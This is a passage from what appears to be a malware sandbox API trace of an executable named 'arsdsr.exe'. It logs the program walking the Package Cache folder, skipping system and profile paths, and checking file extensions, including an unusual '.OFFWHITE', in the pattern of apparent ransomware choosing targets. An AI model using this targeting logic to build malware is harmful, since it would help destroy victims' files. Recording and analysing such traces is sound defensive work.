Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0149.779] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0149.779] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0149.779] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0149.779] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0149.779] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0149.779] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0149.780] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="..") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="...") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="windows") returned -1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$recycle.bin") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="rsa") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ntuser.dat") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="programdata") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="appdata") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files") returned 1 [0149.780] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files (x86)") returned 1 [0149.780] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\" [0149.780] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0149.780] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0149.780] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0149.780] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0149.780] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0149.781] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0149.781] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0149.781] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0149.781] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedc37f80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedc37f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0149.781] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0149.787] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0149.787] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0149.787] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2=".") returned 1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="..") returned 1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="...") returned 1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="windows") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="$recycle.bin") returned 1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="rsa") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="ntuser.dat") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="programdata") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="appdata") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="program files") returned -1 [0149.787] lstrcmpiW (lpString1="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="program files (x86)") returned -1 [0149.787] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0149.787] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0149.787] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\" [0149.787] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\" [0149.788] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*" [0149.788] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0149.788] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0149.788] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0149.788] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0149.788] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0149.788] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0149.788] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0149.788] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\" [0149.789] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0149.789] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\" [0149.789] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\" [0149.789] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*" [0149.789] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0151.544] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.544] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0151.544] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.544] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.544] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0151.544] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0151.544] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="...") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="windows") returned -1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$recycle.bin") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="rsa") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="ntuser.dat") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="programdata") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="appdata") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files") returned 1 [0151.545] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="program files (x86)") returned 1 [0151.545] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\" [0151.545] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0151.545] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" [0151.545] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" [0151.545] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*" [0151.545] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0151.549] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.549] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0151.549] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.549] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.549] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x884c0c00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x884c0c00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x884c0c00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0151.549] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0151.550] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0151.550] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0151.550] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0151.550] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" [0151.550] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0151.550] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.550] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.550] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0151.550] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0151.550] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0151.550] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0151.550] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="...") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$recycle.bin") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="rsa") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="programdata") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="appdata") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files") returned 1 [0151.550] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="program files (x86)") returned 1 [0151.550] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\") returned="C:/Users\\All Users\\Package 